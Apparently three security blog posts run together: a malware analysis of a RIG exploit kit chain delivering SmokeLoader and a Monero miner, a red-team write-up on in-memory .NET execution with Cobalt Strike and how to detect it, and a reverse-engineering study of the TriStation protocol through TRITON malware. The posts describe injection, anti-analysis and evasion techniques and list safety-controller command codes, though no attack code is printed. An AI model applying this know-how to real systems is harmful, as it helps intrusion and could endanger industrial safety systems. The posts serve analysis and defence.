The landing page contains three different JavaScripts snippets, each of which uses a different technique to deliver the payload. Each of these are not new techniques, so we will only be giving a brief overview of each one in this post.

JavaScript 1

The first JavaScript has a function, fa, which returns a VBScript that will be executed using the execScript function, as shown by the code in Figure 3.


Figure 3: JavaScript 1 code snippet

The VBScript exploits CVE-2016-0189 which allows it to download the payload and execute it using the code snippet seen in Figure 4.


Figure 4: VBScript code snippet

JavaScript 2

The second JavaScript contains a function that will retrieve additional JavaScript code and append this script code to the HTML page using the code snippet seen in Figure 5.


Figure 5: JavaScript 2 code snippet

This newly appended JavaScript exploits CVE-2015-2419 which utilizes a vulnerability in JSON.stringify. This script obfuscates the call to JSON.stringify by storing pieces of the exploit in the variables shown in Figure 6.


Figure 6: Obfuscation using variables

Using these variables, the JavaScript calls JSON.stringify with malformed parameters in order to trigger CVE-2015-2419 which in turn will cause native code execution, as shown in Figure 7.


Figure 7: Call to JSON.Stringify

JavaScript 3

The third JavaScript has code that adds additional JavaScript, similar to the second JavaScript. This additional JavaScript adds a flash object that exploits CVE-2018-4878, as shown in Figure 8.


Figure 8: JavaScript 3 code snippet

Once the exploitation is successful, the shellcode invokes a command line to create a JavaScript file with filename u32.tmp, as shown in Figure 9.


Figure 9: WScript command line

This JavaScript file is launched using WScript, which downloads the next-stage payload and executes it using the command line in Figure 10.


Figure 10: Malicious command line

Payload Analysis

For this attack, the actor has used multiple payloads and anti-analysis techniques to bypass the analysis environment. Figure 11 shows the complete malware activity flow chart.


Figure 11: Malware activity flow chart

Analysis of NSIS Loader (SmokeLoader)

The first payload dropped by the RIG EK is a compiled NSIS executable famously known as SmokeLoader. Apart from NSIS files, the payload has two components: a DLL, and a data file (named ‘kumar.dll’ and ‘abaram.dat’ in our analysis case). The DLL has an export function that is invoked by the NSIS executable. This export function has code to read and decrypt the data file, which yields the second stage payload (a portable executable file).

The DLL then spawns itself (dropper) in SUSPENDED_MODE and injects the decrypted PE using process hollowing.

Analysis of Injected Code (Second Stage Payload)

The second stage payload is a highly obfuscated executable. It consists of a routine that decrypts a chunk of code, executes it, and re-encrypts it.

At the entry point, the executable contains code that checks the OS major version, which it extracts from the Process Environment Block (PEB). If the OS version value is less than 6 (prior to Windows Vista), the executable terminates itself. It also contains code that checks whether the executable is in debugged mode, which it extracts from offset 0x2 of the PEB. If the BeingDebugged flag is set, the executable terminates itself.

The malware also implements an Anti-VM check by opening the registry key HKLM\SYSTEM\ControlSet001\Services\Disk\Enum with value 0.

It checks whether the registry value data contains any of the strings: vmware, virtual, qemu, or xen.  Each of these strings is indictative of virtual machines

After running the anti-analysis and environment check, the malware starts executing the core code to perform the malicious activity.

The malware uses the PROPagate injection method to inject and execute the code in a targeted process. The PROPagate method is similar to the SetWindowLong injection technique. In this method, the malware uses the SetPropA function to modify the callback for UxSubclassInfo and cause the remote process to execute the malicious code.

This code injection technique only works for a process with lesser or equal integrity level. The malware first checks whether the integrity of the current running process is medium integrity level (2000, SECURITY_MANDATORY_MEDIUM_RID). Figure 12 shows the code snippet.


Figure 12: Checking integrity level of current process

If the process is higher than medium integrity level, then the malware proceeds further. If the process is lower than medium integrity level, the malware respawns itself with medium integrity.

The malware creates a file mapping object and writes the dropper file path to it and the same mapping object is accessed by injected code, to read the dropper file path and delete the dropper file. The name of the mapping object is derived from the volume serial number of the system drive and a XOR operation with the hardcoded value (Figure 13).

File Mapping Object Name = “Volume Serial Number” + “Volume Serial Number” XOR 0x7E766791


Figure 13: Creating file mapping object name

The malware then decrypts the third stage payload using XOR and decompresses it with RTLDecompressBuffer. The third stage payload is also a PE executable, but the author has modified the header of the file to avoid it being detected as a PE file in memory scanning. After modifying several header fields at the start of decrypted data, we can get the proper executable header (Figure 14).


Figure 14: Injected executable without header (left), and with header (right)

After decrypting the payload, the malware targets the shell process, explorer.exe, for malicious code injection. It uses GetShellWindow and GetWindowThreadProcessId APIs to get the shell window’s thread ID (Figure 15).


Figure 15: Getting shell window thread ID

The malware injects and maps the decrypted PE in a remote process (explorer.exe). It also injects shellcode that is configured as a callback function in SetPropA.

After injecting the payload into the target process, it uses EnumChild and EnumProps functions to enumerate all entries in the property list of the shell window and compares it with UxSubclassInfo

After finding the UxSubclassInfo property of the shell window, it saves the handle info and uses it to set the callback function through SetPropA.

SetPropA has three arguments, the third of which is data. The callback procedure address is stored at the offset 0x14 from the beginning of data. Malware modifies the callback address with the injected shellcode address (Figure 16).


Figure 16: Modifying callback function

The malware then sends a specific message to the window to execute the callback procedure corresponding to the UxSubclassInfo property, which leads to the execution of the shellcode.

The shellcode contains code to execute the address of the entry point of the injected third stage payload using CreateThread. It then resets the callback for SetPropA, which was modified by malware during PROPagate injection. Figure 17 shows the code snippet of the injected shellcode.


Figure 17: Assembly view of injected shellcode

Analysis of Third Stage Payload

Before executing the malicious code, the malware performs anti-analysis checks to make sure no analysis tool is running in the system. It creates two infinitely running threads that contain code to implement anti-analysis checks.

The first thread enumerates the processes using CreateToolhelp32Snapshot and checks for the process names generally used in analysis. It generates a DWORD hash value from the process name using a custom operation and compares it with the array of hardcoded DWORD values. If the generated value matches any value in the array, it terminates the corresponding process.

The second thread enumerates the windows using EnumWindows. It uses GetClassNameA function to extract the class name associated with the corresponding window. Like the first thread, it generates a DWORD hash value from the class name using a custom operation and compares it with the array of hardcoded DWORD values. If the generated value matches any value in the array, it terminates the process related to the corresponding window.

Other than these two anti-analysis techniques, it also has code to check the internet connectivity by trying to reach the URL: www.msftncsi[.]com/ncsi.txt.

To remain persistent in the system, the malware installs a scheduled task and a shortcut file in %startup% folder. The scheduled task is named “Opera Scheduled Autoupdate {Decimal Value of GetTickCount()}”.

The malware then communicates with the malicious URL to download the final payload, which is a Monero miner. It creates a MD5 hash value using Microsoft CryptoAPIs from the computer name and the volume information and sends the hash to the server in a POST request. Figure 18 shows the network communication.


Figure 18: Network communication

The malware then downloads the final payload, the Monero miner, from the server and installs it in the system.

Conclusion

Although we have been observing a decline in Exploit Kit activity, attackers are not abandoning them altogether. In this blog post, we explored how RIG EK is being used with various exploits to compromise endpoints. We have also shown how the NSIS Loader leverages the lesser known PROPagate process injection technique, possibly in an attempt to evade security products.

FireEye MVX and the FireEye Endpoint Security (HX) platform detect this attack at several stages of the attack chain.

Acknowledgement

We would like to thank Sudeep Singh and Alex Berry for their contributions to this blog post.

Bring Your Own Land (BYOL) – A Novel Red Teaming Technique

Introduction

One of most significant recent developments in sophisticated offensive operations is the use of “Living off the Land” (LotL) techniques by attackers. These techniques leverage legitimate tools present on the system, such as the PowerShell scripting language, in order to execute attacks. The popularity of PowerShell as an offensive tool culminated in the development of entire Red Team frameworks based around it, such as Empire and PowerSploit. In addition, the execution of PowerShell can be obfuscated through the use of tools such as “Invoke-Obfuscation”. In response, defenders have developed detections for the malicious use of legitimate applications. These detections include suspicious parent/child process relationships, suspicious process command line arguments, and even deobfuscation of malicious PowerShell scripts through the use of Script Block Logging.

In this blog post, I will discuss an alternative to current LotL techniques. With the most current build of Cobalt Strike (version 3.11), it is now possible to execute .NET assemblies entirely within memory by using the “execute-assembly” command. By developing custom C#-based assemblies, attackers no longer need to rely on the tools present on the target system; they can instead write and deliver their own tools, a technique I call Bring Your Own Land (BYOL). I will demonstrate this technique through the use of a custom .NET assembly that replicates some of the functionality of the PowerSploit project. I will also discuss how detections can be developed around BYOL techniques.

Background

At DerbyCon last year, I had the pleasure of meeting Raphael Mudge, the developer behind the Cobalt Strike Remote Access Tool (RAT). During our discussion, I mentioned how useful it would be to be able to load .NET assemblies into Cobalt Strike beacons, similar to how PowerShell scripts can be imported using the “powershell-import” command. During a previous Red Team engagement I had been involved in, the use of PowerShell was precluded by the Endpoint Detection and Response (EDR) agent present on host machines within the target environment. This was a significant issue, as much of my red teaming methodology at the time was based on the use of various PowerShell scripts. For example, the “Get-NetUser” cmdlet of the PowerView script allows for the enumeration of domain users within an Active Directory environment. While the use of PowerShell was not an option, I found that no application-based whitelisting was occurring on hosts within the target’s environment. Therefore, I started converting the PowerShell functionality into C# code, compiling assemblies locally as Portable Executable (PE) files, and then uploading the PE files onto target machines and executing them. This tactic was successful, and I was able to use these custom assemblies to elevate privileges up to Domain Admin within the target environment.

Raphael agreed that the ability to load these assemblies in-memory using a Cobalt Strike beacon would be useful, and about 8 months later this functionality was incorporated into Cobalt Strike version 3.11 via the “execute-assembly” command.

“execute-assembly” Demonstration

For this demonstration, a custom C# .NET assembly named “get-users” was used. This assembly replicated some of the functionality of the PowerView “Get-NetUser” cmdlet; it queried the Domain Controller of the specified domain for a list of all current domain accounts. Information obtained included the “SAMAccountName”, “UserGivenName”, and “UserSurname” properties for each account. The domain is specified by passing its FQDN as an argument, and the results are then sent to stdout. The assembly being executed within a Cobalt Strike beacon is shown in Figure 1.


Figure 1: Using the “execute-assembly” command within a Cobalt Strike beacon.

Simple enough, now let’s take a look at how this technique works under the hood.

How “execute-assembly” Works

In order to discover more about how the “execute-assembly” command works, the execution performed in Figure 1 was repeated with the host running ProcMon. The results of the process tree from ProcMon after execution are shown in Figure 2.


Figure 2: Process tree from ProcMon after executing “execute-assembly” command.

In Figure 2, The “powershell.exe (2792)” process contains the beacon, while the “rundll32.exe (2708)” process is used to load and execute the “get-users” assembly. Note that “powershell.exe” is shown as the parent process of “rundll32.exe” in this example because the Cobalt Strike beacon was launched by using a PowerShell one-liner; however, nearly any process can be used to host a beacon by leveraging various process migration techniques. From this information, we can determine that the “execute-assembly” command is similar to other Cobalt Strike post-exploitation jobs. In Cobalt Strike, some functions are offloaded to new processes, in order to ensure the stability of the beacon. The rundll32.exe Windows binary is used by default, although this setting can be changed. In order to migrate the necessary code into the new process, the CreateRemoteThread function is used. We can confirm that this function is utilized by monitoring the host with Sysmon while the “execute-assembly” command is performed. The event generated by the use of the CreateRemoteThread function is shown in Figure 3.


Figure 3: CreateRemoteThread Sysmon event, created after performing the “execute-assembly” command.

More information about this event is shown in Figure 4.


Figure 4: Detailed information about the Sysmon CreateRemoteThread event shown in Figure 3.

In order to execute the provided assembly, the Common Language Runtime (CLR) must be loaded into the newly created process. From the ProcMon logs, we can determine the exact DLLs that are loaded during this step. A portion of these DLLs are shown in Figure 5.


Figure 5: Example of DLLs loaded into rundll32 for hosting the CLR.

In addition, DLLs loaded into the rundll32 process include those necessary for the get-users assembly, such as those for LDAP communication and Kerberos authentication. A portion of these DLLs are shown in Figure 6.


Figure 6: Example of DLLs loaded into rundll32 for Kerberos authentication.

The ProcMon logs confirm that the provided assembly is never written to disk, making the “execute-assembly” command an entirely in-memory attack.

Detecting and Preventing “execute-assembly”

There are several ways to protect against the “execute-assembly” command. As previously detailed, because the technique is a post-exploitation job in Cobalt Strike, it uses the CreateRemoteThread function, which is commonly detected by EDR solutions. However, it is possible that other implementations of BYOL techniques would not require the use of the CreateRemoteThread function.

The “execute-assembly” technique makes use of the native LoadImage function in order to load the provided assembly. The CLRGuard project hooks into the use of this function, and prevents its execution. An example of CLRGuard preventing the execution of the “execute-assembly” command is shown in Figure 7.


Figure 7: CLRGuard blocking the execution of the “execute-assembly” technique.

The resulting error is shown on the Cobalt Strike teamserver in Figure 8.


Figure 8: Error shown in Cobalt Strike when “execute-assembly” is blocked by CLRGuard.

While CLRGuard is effective at preventing the “execute-assembly” command, as well as other BYOL techniques, it is likely that blocking all use of the LoadImage function on a system would negatively impact other benign applications, and is not recommended for production environments.

As with almost all security issues, baselining and correlation is the most effective means of detecting this technique. Suspicious events to correlate could include the use of the LoadImage function by processes that do not typically utilize it, and unusual DLLs being loaded into processes.

Advantages of BYOL

Due to the prevalent use of PowerShell scripts by sophisticated attackers, detection of malicious PowerShell activity has become a primary focus of current detection methodology. In particular, version 5 of PowerShell allows for the use of Script Block Logging, which is capable of recording exactly what PowerShell scripts are executed by the system, regardless of obfuscation techniques. In addition, Constrained Language mode can be used to restrict PowerShell functionality. While bypasses exist for these protections, such as PowerShell downgrade attacks, each bypass an attacker attempts is another event that a defender can trigger off of. BYOL allows for the execution of attacks normally performed by PowerShell scripts, while avoiding all potential PowerShell-based alerts entirely.

PowerShell is not the only native binary whose malicious use is being tracked by defenders. Other common binaries that can generate alerts on include WMIC, schtasks/at, and reg. The functionality of all these tools can be replicated within custom .NET assemblies, due to the flexibility of C# code. By being able to perform the same functionality as these tools without using them, alerts that are based on their malicious use are rendered ineffective.

Finally, thanks to the use of reflective loading, the BYOL technique can be performed entirely in-memory, without the need to write to disk.

Conclusion

BYOL presents a powerful new technique for red teamers to remain undetected during their engagements, and can easily be used with Cobalt Strike’s “execute-assembly” command. In addition, the use of C# assemblies can offer attackers more flexibility than similar PowerShell scripts can afford. Detections for CLR-based techniques, such as hooking of functions used to reflectively load assemblies, should be incorporated into defensive methodology, as these attacks are likely to become more prevalent as detections for LotL techniques mature.

Acknowledgement

Special thanks to Casey Erikson, who I have worked closely with on developing C# assemblies that leverage this technique, for his contributions to this blog.

A Totally Tubular Treatise on TRITON and TriStation

Introduction

In December 2017, FireEye's Mandiant discussed an incident response involving the TRITON framework. The TRITON attack and many of the publicly discussed ICS intrusions involved routine techniques where the threat actors used only what is necessary to succeed in their mission. For both INDUSTROYER and TRITON, the attackers moved from the IT network to the OT (operational technology) network through systems that were accessible to both environments. Traditional malware backdoors, Mimikatz distillates, remote desktop sessions, and other well-documented, easily-detected attack methods were used throughout these intrusions.

Despite the routine techniques employed to gain access to an OT environment, the threat actors behind the TRITON malware framework invested significant time learning about the Triconex Safety Instrumented System (SIS) controllers and TriStation, a proprietary network communications protocol. The investment and purpose of the Triconex SIS controllers leads Mandiant to assess the attacker's objective was likely to build the capability to cause physical consequences.

TriStation remains closed source and there is no official public information detailing the structure of the protocol, raising several questions about how the TRITON framework was developed. Did the actor have access to a Triconex controller and TriStation 1131 software suite? When did development first start? How did the threat actor reverse engineer the protocol, and to what extent? What is the protocol structure?

FireEye’s Advanced Practices Team was born to investigate adversary methodologies, and to answer these types of questions, so we started with a deeper look at the TRITON’s own Python scripts.

Glossary:

  • TRITON – Malware framework designed to operate Triconex SIS controllers via the TriStation protocol.
  • TriStation – UDP network protocol specific to Triconex controllers.
  • TRITON threat actor – The human beings who developed, deployed and/or operated TRITON.

Diving into TRITON's Implementation of TriStation

TriStation is a proprietary network protocol and there is no public documentation detailing its structure or how to create software applications that use TriStation. The current TriStation UDP/IP protocol is little understood, but natively implemented through the TriStation 1131 software suite. TriStation operates by UDP over port 1502 and allows for communications between designated masters (PCs with the software that are “engineering workstations”) and slaves (Triconex controllers with special communications modules) over a network.

To us, the Triconex systems, software and associated terminology sound foreign and complicated, and the TriStation protocol is no different. Attempting to understand the protocol from ground zero would take a considerable amount of time and reverse engineering effort – so why not learn from TRITON itself? With the TRITON framework containing TriStation communication functionality, we pursued studying the framework to better understand this mysterious protocol. Work smarter, not harder, amirite?

The TRITON framework has a multitude of functionalities, but we started with the basic components:

  • TS_cnames.pyc # Compiled at: 2017-08-03 10:52:33
  • TsBase.pyc # Compiled at: 2017-08-03 10:52:33
  • TsHi.pyc # Compiled at: 2017-08-04 02:04:01
  • TsLow.pyc # Compiled at: 2017-08-03 10:46:51

TsLow.pyc (Figure 1) contains several pieces of code for error handling, but these also present some cues to the protocol structure.


Figure 1: TsLow.pyc function print_last_error()

In the TsLow.pyc’s function for print_last_error we see error handling for “TCM Error”. This compares the TriStation packet value at offset 0 with a value in a corresponding array from TS_cnames.pyc (Figure 2), which is largely used as a “dictionary” for the protocol.


Figure 2: TS_cnames.pyc TS_cst array

From this we can infer that offset 0 of the TriStation protocol contains message types. This is supported by an additional function, tcm_result, which declares type, size = struct.unpack('<HH', data_received[0:4]), stating that the first two bytes should be handled as integer type and the second two bytes are integer size of the TriStation message. This is our first glimpse into what the threat actor(s) understood about the TriStation protocol.

Since there are only 11 defined message types, it really doesn't matter much if the type is one byte or two because the second byte will always be 0x00.

We also have indications that message type 5 is for all Execution Command Requests and Responses, so it is curious to observe that the TRITON developers called this “Command Reply.” (We won’t understand this naming convention until later.)

Next we examine TsLow.pyc’s print_last_error function (Figure 3) to look at “TS Error” and “TS_names.” We begin by looking at the ts_err variable and see that it references ts_result.


Figure 3: TsLow.pyc function print_last_error() with ts_err highlighted

We follow that thread to ts_result, which defines a few variables in the next 10 bytes (Figure 4): dir, cid, cmd, cnt, unk, cks, siz = struct.unpack('<, ts_packet[0:10]). Now things are heating up. What fun. There’s a lot to unpack here, but the most interesting thing is how this piece script breaks down 10 bytes from ts_packet into different variables.


Figure 4: ts_result with ts_packet header variables highlighted


Figure 5: tcm_result

Referencing tcm_result (Figure 5) we see that it defines type and size as the first four bytes (offset 0 – 3) and tcm_result returns the packet bytes 4:-2 (offset 4 to the end minus 2, because the last two bytes are the CRC-16 checksum). Now that we know where tcm_result leaves off, we know that the ts_reply “cmd” is a single byte at offset 6, and corresponds to the values in the TS_cnames.pyc array and TS_names (Figure 6). The TRITON script also tells us that any integer value over 100 is a likely “command reply.” Sweet.

When looking back at the ts_result packet header definitions, we begin to see some gaps in the TRITON developer's knowledge: dir, cid, cmd, cnt, unk, cks, siz = struct.unpack('<, ts_packet[0:10]). We're clearly speculating based on naming conventions, but we get an impression that offsets 4, 5 and 6 could be "direction", "controller ID" and "command", respectively. Values such as "unk" show that the developer either did not know or did not care to identify this value. We suspect it is a constant, but this value is still unknown to us.


Figure 6: Excerpt TS_cnames.pyc TS_names array, which contain TRITON actor’s notes for execution command function codes

TriStation Protocol Packet Structure

The TRITON threat actor’s knowledge and reverse engineering effort provides us a better understanding of the protocol. From here we can start to form a more complete picture and document the basic functionality of TriStation. We are primarily interested in message type 5, Execution Command, which best illustrates the overall structure of the protocol. Other, smaller message types will have varying structure.


Figure 7: Sample TriStation "Allocate Program" Execution Command, with color annotation and protocol legend

Corroborating the TriStation Analysis

Minute discrepancies aside, the TriStation structure detailed in Figure 7 is supported by other public analyses. Foremost, researchers from the Coordinated Science Laboratory (CSL) at University of Illinois at Urbana-Champaign published a 2017 paper titled "Attack Induced Common-Mode Failures on PLC-based Safety System in a Nuclear Power Plant". The CSL team mentions that they used the Triconex System Access Application (TSAA) protocol to reverse engineer elements of the TriStation protocol. TSAA is a protocol developed by the same company as TriStation. Unlike TriStation, the TSAA protocol structure is described within official documentation. CSL assessed similarities between the two protocols would exist and they leveraged TSAA to better understand TriStation. The team's overall research and analysis of the general packet structure aligns with our TRITON-sourced packet structure.

There are some awesome blog posts and whitepapers out there that support our findings in one way or another. Writeups by Midnight Blue Labs, Accenture, and US-CERT each explain how the TRITON framework relates to the TriStation protocol in superb detail.

TriStation's Reverse Engineering and TRITON's Development

When TRITON was discovered, we began to wonder how the TRITON actor reverse engineered TriStation and implemented it into the framework. We have a lot of theories, all of which seemed plausible: Did they build, buy, borrow, or steal? Or some combination thereof?

Our initial theory was that the threat actor purchased a Triconex controller and software for their own testing and reverse engineering from the "ground up", although if this was the case we do not believe they had a controller with the exact vulnerable firmware version, else they would have had fewer problems with TRITON in practice at the victim site. They may have bought or used a demo version of the TriStation 1131 software, allowing them to reverse engineer enough of TriStation for the framework. They may have stolen TriStation Python libraries from ICS companies, subsidiaries or system integrators and used the stolen material as a base for TriStation and TRITON development. But then again, it is possible that they borrowed TriStation software, Triconex hardware and Python connectors from government-owned utility that was using them legitimately.

Looking at the raw TRITON code, some of the comments may appear oddly phrased, but we do get a sense that the developer is clearly using many of the right vernacular and acronyms, showing smarts on PLC programming. The TS_cnames.pyc script contains interesting typos such as 'Set lable', 'Alocate network accepted', 'Symbol table ccepted' and 'Set program information reponse'. These appear to be normal human error and reflect neither poor written English nor laziness in coding. The significant amount of annotation, cascading logic, and robust error handling throughout the code suggests thoughtful development and testing of the framework. This complicates the theory of "ground up" development, so did they base their code on something else?

While learning from the TriStation functionality within TRITON, we continued to explore legitimate TriStation software. We began our search for "TS1131.exe" and hit dead ends sorting through TriStation DLLs until we came across a variety of TriStation utilities in MSI form. We ultimately stumbled across a juicy archive containing "Trilog v4." Upon further inspection, this file installed "TriLog.exe," which the original TRITON executable mimicked, and a couple of supporting DLLs, all of which were timestamped around August 2006.

When we saw the DLL file description "Tricon Communications Interface" and original file name "TricCom.DLL", we knew we were in the right place. With a simple look at the file strings, "BAZINGA!" We struck gold.

File Name

tr1com40.dll

MD5

069247DF527A96A0E048732CA57E7D3D

Size

110592

Compile Date

2006-08-23

File Description

Tricon Communications Interface

Product Name

TricCom Dynamic Link Library

File Version

4.2.441

Original File Name

TricCom.DLL

Copyright

Copyright © 1993-2006 Triconex Corporation

The tr1com40.DLL is exactly what you would expect to see in a custom application package. It is a library that helps support the communications for a Triconex controller. If you've pored over TRITON as much as we have, the moment you look at strings you can see the obvious overlaps between the legitimate DLL and TRITON's own TS_cnames.pyc.


Figure 8: Strings excerpt from tr1com40.DLL

Each of the execution command "error codes" from TS_cnames.pyc are in the strings of tr1com40.DLL (Figure 8). We see "An MP has re-educated" and "Invalid Tristation I command". Even misspelled command strings verbatim such as "Non-existant data item" and "Alocate network accepted". We also see many of the same unknown values. What is obvious from this discovery is that some of the strings in TRITON are likely based on code used in communications libraries for Trident and Tricon controllers.

In our brief survey of the legitimate Triconex Corporation binaries, we observed a few samples with related string tables.

Pe:dllname

Compile Date

Reference CPP Strings Code

Lagcom40.dll

2004/11/19

$Workfile:   LAGSTRS.CPP  $ $Modtime:   Jul 21 1999 17:17:26  $ $Revision:   1.0

Tr1com40.dll

2006/08/23

$Workfile:   TR1STRS.CPP  $ $Modtime:   May 16 2006 09:55:20  $ $Revision:   1.4

Tridcom.dll

2008/07/23

$Workfile:   LAGSTRS.CPP  $ $Modtime:   Jul 21 1999 17:17:26  $ $Revision:   1.0

Triccom.dll

2008/07/23

$Workfile:   TR1STRS.CPP  $ $Modtime:   May 16 2006 09:55:20  $ $Revision:   1.4

Tridcom.dll

2010/09/29

$Workfile:   LAGSTRS.CPP  $ $Modtime:   Jul 21 1999 17:17:26  $ $Revision:   1.0 

Tr1com.dll

2011/04/27

$Workfile:   TR1STRS.CPP  $ $Modtime:   May 16 2006 09:55:20  $ $Revision:   1.4

Lagcom.dll

2011/04/27

$Workfile:   LAGSTRS.CPP  $ $Modtime:   Jul 21 1999 17:17:26  $ $Revision:   1.0

Triccom.dll

2011/04/27

$Workfile:   TR1STRS.CPP  $ $Modtime:   May 16 2006 09:55:20  $ $Revision:   1.4

We extracted the CPP string tables in TR1STRS and LAGSTRS and the TS_cnames.pyc TS_names array from TRITON, and compared the 210, 204, and 212 relevant strings from each respective file.

TS_cnames.pyc TS_names and tr1com40.dll share 202 of 220 combined table strings. The remaining strings are unique to each, as seen here:

TS_cnames.TS_names (2017 pyc)

Tr1com40.dll (2006 CPP)

Go to DOWNLOAD mode

<200>

Not set

<209>

Unk75

Bad message from module

Unk76

Bad message type

Unk77

Bad TMI version number

Unk78

Module did not respond

Unk79

Open Connection: Invalid SAP %d

Unk81

Unsupported message for this TMI version

Unk83

 

Wrong command

 

TS_cnames.pyc TS_names and Tridcom.dll (1999 CPP) shared only 151 of 268 combined table strings, showing a much smaller overlap with the seemingly older CPP library. This makes sense based on the context that Tridcom.dll is meant for a Trident controller, not a Tricon controller. It does seem as though Tr1com40.dll and TR1STRS.CPP code was based on older work.

We are not shocked to find that the threat actor reversed legitimate code to bolster development of the TRITON framework. They want to work smarter, not harder, too. But after reverse engineering legitimate software and implementing the basics of the TriStation, the threat actors still had an incomplete understanding of the protocol. In TRITON's TS_cnames.pyc we saw "Unk75", "Unk76", "Unk83" and other values that were not present in the tr1com40.DLL strings, indicating that the TRITON threat actor may have explored the protocol and annotated their findings beyond what they reverse engineered from the DLL. The gaps in TriStation implementation show us why the actors encountered problems interacting with the Triconex controllers when using TRITON in the wild.

You can see more of the Trilog and Triconex DLL files on VirusTotal.

Item Name

MD5

Description

Tr1com40.dll

069247df527a96a0e048732ca57e7d3d

Tricom Communcations DLL

Data1.cab

e6a3c93a6d433cbaf6f573b6c09d76c4

Parent of Tr1com40.dll

Trilog v4.1.360R

13a3b83ba2c4236ca59aba679941c8a5

RAR Archive of TriLog

TridCom.dll

5c2ed617fdec4779cb33c89082a43100

Trident Communications DLL

Afterthoughts

Seeing Triconex systems targeted with malicious intent was new to the world six months ago. Moving forward it would be reasonable to anticipate additional frameworks, such as TRITON, designed for usage against other SIS controllers and associated technologies. If Triconex was within scope, we may see similar attacker methodologies affecting the dominant industrial safety technologies.

Basic security measures do little to thwart truly persistent threat actors and monitoring only IT networks is not an ideal situation. Visibility into both the IT and OT environments is critical for detecting the various stages of an ICS intrusion. Simple detection concepts such as baseline deviation can provide insight into abnormal activity.

While the TRITON framework was actively in use, how many traditional ICS “alarms” were set off while the actors tested their exploits and backdoors on the Triconex controller? How many times did the TriStation protocol, as implemented in their Python scripts, fail or cause errors because of non-standard traffic? How many TriStation UDP pings were sent and how many Connection Requests? How did these statistics compare to the baseline for TriStation traffic? There are no answers to these questions for now. We believe that we can identify these anomalies in the long run if we strive for increased visibility into ICS technologies.

We hope that by holding public discussions about ICS technologies, the Infosec community can cultivate closer relationships with ICS vendors and give the world better insight into how attackers move from the IT to the OT space. We want to foster more conversations like this and generally share good techniques for finding evil. Since most of all ICS attacks involve standard IT intrusions, we should probably come together to invent and improve any guidelines for how to monitor PCs and engineering workstations that bridge the IT and OT networks. We envision a world where attacking or disrupting ICS operations costs the threat actor their cover, their toolkits, their time, and their freedom. It's an ideal world, but something nice to shoot for.

Thanks and Future Work

There is still much to do for TRITON and TriStation. There are many more sub-message types and nuances for parsing out the nitty gritty details, which is hard to do without a controller of our own. And although we’ve published much of what we learned about the TriStation here on the blog, our work will continue as we continue our study of the protocol.

Thanks to everyone who did so much public research on TRITON and TriStation. We have cited a few individuals in this blog post, but there is a lot more community-sourced information that gave us clues and leads for our research and testing of the framework and protocol. We also have to acknowledge the research performed by the TRITON attackers. We borrowed a lot of your knowledge about TriStation from the TRITON framework itself.

Finally, remember that we're here to collaborate. We think most of our research is right, but if you notice any errors or omissions, or have ideas for improvements, please spear phish contact: smiller@fireeye.com.

Recommended Reading

Appendix A: TriStation Message Type Codes

The following table consists of hex values at offset 0 in the TriStation UDP packets and the associated dictionary definitions, extracted verbatim from the TRITON framework in library TS_cnames.pyc.

Value at 0x0

Message Type

1

Connection Request

2

Connection Response

3

Disconnect Request

4

Disconnect Response

5

Execution Command

6

Ping Command

7

Connection Limit Reached

8

Not Connected

9

MPS Are Dead

10

Access Denied

11

Connection Failed

Appendix B: TriStation Execution Command Function Codes

The following table consists of hex values at offset 6 in the TriStation UDP packets and the associated dictionary definitions, extracted verbatim from the TRITON framework in library TS_cnames.pyc.

Value at 0x6

TS_cnames String

0

0: 'Start download all',

1

1: 'Start download change',

2

2: 'Update configuration',

3

3: 'Upload configuration',

4

4: 'Set I/O addresses',

5

5: 'Allocate network',

6

6: 'Load vector table',

7

7: 'Set calendar',

8

8: 'Get calendar',

9

9: 'Set scan time',

A

10: 'End download all',

B

11: 'End download change',

C

12: 'Cancel download change',

D

13: 'Attach TRICON',

E

14: 'Set I/O address limits',

F

15: 'Configure module',

10

16: 'Set multiple point values',

11

17: 'Enable all points',

12

18: 'Upload vector table',

13

19: 'Get CP status ',

14

20: 'Run program',

15

21: 'Halt program',

16

22: 'Pause program',

17

23: 'Do single scan',

18

24: 'Get chassis status',

19

25: 'Get minimum scan time',

1A

26: 'Set node number',

1B

27: 'Set I/O point values',

1C

28: 'Get I/O point values',

1D

29: 'Get MP status',

1E

30: 'Set retentive values',

1F

31: 'Adjust clock calendar',

20

32: 'Clear module alarms',

21

33: 'Get event log',

22

34: 'Set SOE block',

23

35: 'Record event log',

24

36: 'Get SOE data',

25

37: 'Enable OVD',

26

38: 'Disable OVD',

27

39: 'Enable all OVDs',

28

40: 'Disable all OVDs',

29

41: 'Process MODBUS',

2A

42: 'Upload network',

2B

43: 'Set lable',

2C

44: 'Configure system variables',

2D

45: 'Deconfigure module',

2E

46: 'Get system variables',

2F

47: 'Get module types',

30

48: 'Begin conversion table download',

31

49: 'Continue conversion table download',

32

50: 'End conversion table download',

33

51: 'Get conversion table',

34

52: 'Set ICM status',

35

53: 'Broadcast SOE data available',

36

54: 'Get module versions',

37

55: 'Allocate program',

38

56: 'Allocate function',

39

57: 'Clear retentives',

3A

58: 'Set initial values',

3B

59: 'Start TS2 program download',

3C

60: 'Set TS2 data area',

3D

61: 'Get TS2 data',

3E

62: 'Set TS2 data',

3F

63: 'Set program information',

40

64: 'Get program information',

41

65: 'Upload program',

42

66: 'Upload function',

43

67: 'Get point groups',

44

68: 'Allocate symbol table',

45

69: 'Get I/O address',

46

70: 'Resend I/O address',

47

71: 'Get program timing',

48

72: 'Allocate multiple functions',

49

73: 'Get node number',

4A

74: 'Get symbol table',

4B

75: 'Unk75',

4C

76: 'Unk76',

4D

77: 'Unk77',

4E

78: 'Unk78',

4F

79: 'Unk79',

50

80: 'Go to DOWNLOAD mode',

51

81: 'Unk81',

52

 

53

83: 'Unk83',

54

 

55

 

56

 

57

 

58

 

59

 

5A

 

5B

 

5C

 

5D

 

5E

 

5F

 

60

 

61

 

62

 

63

 

64

100: 'Command rejected',

65

101: 'Download all permitted',

66

102: 'Download change permitted',

67

103: 'Modification accepted',

68

104: 'Download cancelled',

69

105: 'Program accepted',

6A

106: 'TRICON attached',

6B

107: 'I/O addresses set',

6C

108: 'Get CP status response',

6D

109: 'Program is running',

6E

110: 'Program is halted',

6F

111: 'Program is paused',

70

112: 'End of single scan',

71

113: 'Get chassis configuration response',

72

114: 'Scan period modified',

73

115: '<115>',

74

116: '<116>',

75

117: 'Module configured',

76

118: '<118>',

77

119: 'Get chassis status response',

78

120: 'Vectors response',

79

121: 'Get I/O point values response',

7A

122: 'Calendar changed',

7B

123: 'Configuration updated',

7C

124: 'Get minimum scan time response',

7D

125: '<125>',

7E

